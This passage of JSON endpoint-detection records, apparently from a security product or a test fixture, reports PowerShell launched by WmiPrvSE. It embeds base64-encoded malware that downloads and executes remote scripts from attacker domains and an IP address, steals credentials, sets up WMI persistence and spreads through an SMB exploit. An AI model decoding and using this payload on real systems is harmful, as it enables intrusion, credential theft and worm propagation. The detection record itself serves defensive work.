ABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4